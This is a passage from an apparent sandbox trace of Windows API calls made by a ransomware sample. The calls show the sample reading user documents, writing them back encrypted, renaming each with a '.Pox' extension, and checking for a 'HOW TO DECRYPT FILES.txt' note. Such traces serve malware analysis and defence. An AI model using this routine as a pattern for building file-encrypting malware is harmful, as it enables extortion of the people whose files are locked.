ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0038.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg", lpFilePart=0x0) returned 0x38 [0038.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0038.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\gxntb.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.093] GetFileType (hFile=0x26c) returned 0x1 [0038.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0038.093] GetFileType (hFile=0x26c) returned 0x1 [0038.093] WriteFile (in: hFile=0x26c, lpBuffer=0x365e398*, nNumberOfBytesToWrite=0x16cd0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x365e398*, lpNumberOfBytesWritten=0x3ae4f0*=0x16cd0, lpOverlapped=0x0) returned 1 [0038.095] CloseHandle (hObject=0x26c) returned 1 [0038.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg", lpFilePart=0x0) returned 0x38 [0038.097] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg.Pox", lpFilePart=0x0) returned 0x3c [0038.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0038.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\gxntb.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816b2d0, ftCreationTime.dwHighDateTime=0x1d4c55e, ftLastAccessTime.dwLowDateTime=0xb50f35e0, ftLastAccessTime.dwHighDateTime=0x1d4d295, ftLastWriteTime.dwLowDateTime=0x28e32da0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16cd0)) returned 1 [0038.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0038.097] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\gxntb.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\gxntb.jpg.pox")) returned 1 [0038.097] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf", lpFilePart=0x0) returned 0x3e [0038.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0038.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\khflog p4e5.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.097] GetFileType (hFile=0x26c) returned 0x1 [0038.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0038.098] GetFileType (hFile=0x26c) returned 0x1 [0038.098] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x18e88 [0038.098] ReadFile (in: hFile=0x26c, lpBuffer=0x3675088, nNumberOfBytesToRead=0x18e88, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x3675088*, lpNumberOfBytesRead=0x3ae4fc*=0x18e88, lpOverlapped=0x0) returned 1 [0038.101] CloseHandle (hObject=0x26c) returned 1 [0038.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0038.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0038.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf", lpFilePart=0x0) returned 0x3e [0038.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0038.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\khflog p4e5.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.129] GetFileType (hFile=0x26c) returned 0x1 [0038.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0038.129] GetFileType (hFile=0x26c) returned 0x1 [0038.129] WriteFile (in: hFile=0x26c, lpBuffer=0x342c610*, nNumberOfBytesToWrite=0x18e90, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x342c610*, lpNumberOfBytesWritten=0x3ae4f0*=0x18e90, lpOverlapped=0x0) returned 1 [0038.132] CloseHandle (hObject=0x26c) returned 1 [0038.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf", lpFilePart=0x0) returned 0x3e [0038.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf.Pox", lpFilePart=0x0) returned 0x42 [0038.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0038.133] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\khflog p4e5.pdf"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a13870, ftCreationTime.dwHighDateTime=0x1d4ceef, ftLastAccessTime.dwLowDateTime=0xc23210, ftLastAccessTime.dwHighDateTime=0x1d4c915, ftLastWriteTime.dwLowDateTime=0x28ea51c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x18e90)) returned 1 [0038.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0038.133] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\khflog p4e5.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\kHfLoG p4e5.pdf.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\khflog p4e5.pdf.pox")) returned 1 [0038.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv", lpFilePart=0x0) returned 0x3f [0038.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0038.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\pkpief7b-b-a.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.134] GetFileType (hFile=0x26c) returned 0x1 [0038.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0038.134] GetFileType (hFile=0x26c) returned 0x1 [0038.134] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x152f3 [0038.135] ReadFile (in: hFile=0x26c, lpBuffer=0x34454c0, nNumberOfBytesToRead=0x152f3, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x34454c0*, lpNumberOfBytesRead=0x3ae4fc*=0x152f3, lpOverlapped=0x0) returned 1 [0038.136] CloseHandle (hObject=0x26c) returned 1 [0038.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0038.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0038.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv", lpFilePart=0x0) returned 0x3f [0038.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0038.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\pkpief7b-b-a.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.187] GetFileType (hFile=0x26c) returned 0x1 [0038.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0038.187] GetFileType (hFile=0x26c) returned 0x1 [0038.187] WriteFile (in: hFile=0x26c, lpBuffer=0x34af3f0*, nNumberOfBytesToWrite=0x15300, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x34af3f0*, lpNumberOfBytesWritten=0x3ae4f0*=0x15300, lpOverlapped=0x0) returned 1 [0038.189] CloseHandle (hObject=0x26c) returned 1 [0038.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv", lpFilePart=0x0) returned 0x3f [0038.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv.Pox", lpFilePart=0x0) returned 0x43 [0038.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0038.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\pkpief7b-b-a.csv"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15300)) returned 1 [0038.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0038.190] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\pkpief7b-b-a.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\pKpIeF7B-b-a.csv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\pkpief7b-b-a.csv.pox")) returned 1 [0038.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.191] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", lpFilePart=0x0) returned 0x3a [0038.191] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", lpFilePart=0x0) returned 0x3b [0038.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x88d79d70, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x88d79d70, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0038.191] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x88d79d70, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x88d79d70, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.191] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55866910, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0xb41e1e10, ftLastAccessTime.dwHighDateTime=0x1d4d0f3, ftLastWriteTime.dwLowDateTime=0xb41e1e10, ftLastWriteTime.dwHighDateTime=0x1d4d0f3, nFileSizeHigh=0x0, nFileSizeLow=0x6946, dwReserved0=0x0, dwReserved1=0x0, cFileName="80Sx6N6hteC.mp3", cAlternateFileName="80SX6N~1.MP3")) returned 1 [0038.191] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74006f20, ftCreationTime.dwHighDateTime=0x1d4c79f, ftLastAccessTime.dwLowDateTime=0x4db3390, ftLastAccessTime.dwHighDateTime=0x1d4cbc4, ftLastWriteTime.dwLowDateTime=0x4db3390, ftLastWriteTime.dwHighDateTime=0x1d4cbc4, nFileSizeHigh=0x0, nFileSizeLow=0x95e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="9edNK3IVw1MImZ82b.m4a", cAlternateFileName="9EDNK3~1.M4A")) returned 1 [0038.192] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d63400, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0x60dfa910, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x60dfa910, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="saeAQ1gG.m4a", cAlternateFileName="")) returned 1 [0038.192] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.193] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0038.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.193] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN", lpFilePart=0x0) returned 0x3a [0038.193] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\", lpFilePart=0x0) returned 0x3b [0038.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x88d79d70, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x88d79d70, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0038.194] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x88d79d70, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x88d79d70, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.194] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55866910, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0xb41e1e10, ftLastAccessTime.dwHighDateTime=0x1d4d0f3, ftLastWriteTime.dwLowDateTime=0xb41e1e10, ftLastWriteTime.dwHighDateTime=0x1d4d0f3, nFileSizeHigh=0x0, nFileSizeLow=0x6946, dwReserved0=0x0, dwReserved1=0x0, cFileName="80Sx6N6hteC.mp3", cAlternateFileName="80SX6N~1.MP3")) returned 1 [0038.195] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74006f20, ftCreationTime.dwHighDateTime=0x1d4c79f, ftLastAccessTime.dwLowDateTime=0x4db3390, ftLastAccessTime.dwHighDateTime=0x1d4cbc4, ftLastWriteTime.dwLowDateTime=0x4db3390, ftLastWriteTime.dwHighDateTime=0x1d4cbc4, nFileSizeHigh=0x0, nFileSizeLow=0x95e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="9edNK3IVw1MImZ82b.m4a", cAlternateFileName="9EDNK3~1.M4A")) returned 1 [0038.195] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d63400, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0x60dfa910, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x60dfa910, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="saeAQ1gG.m4a", cAlternateFileName="")) returned 1 [0038.195] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d63400, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0x60dfa910, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x60dfa910, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="saeAQ1gG.m4a", cAlternateFileName="")) returned 0 [0038.195] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0038.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.195] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3", lpFilePart=0x0) returned 0x4a [0038.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0038.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zh5khkzpc6aokc3jgphn\\80sx6n6htec.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.196] GetFileType (hFile=0x26c) returned 0x1 [0038.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0038.196] GetFileType (hFile=0x26c) returned 0x1 [0038.196] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x6946 [0038.196] ReadFile (in: hFile=0x26c, lpBuffer=0x24094dc, nNumberOfBytesToRead=0x6946, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x24094dc*, lpNumberOfBytesRead=0x3ae4fc*=0x6946, lpOverlapped=0x0) returned 1 [0038.197] CloseHandle (hObject=0x26c) returned 1 [0038.213] GetFullPathNameW (in: 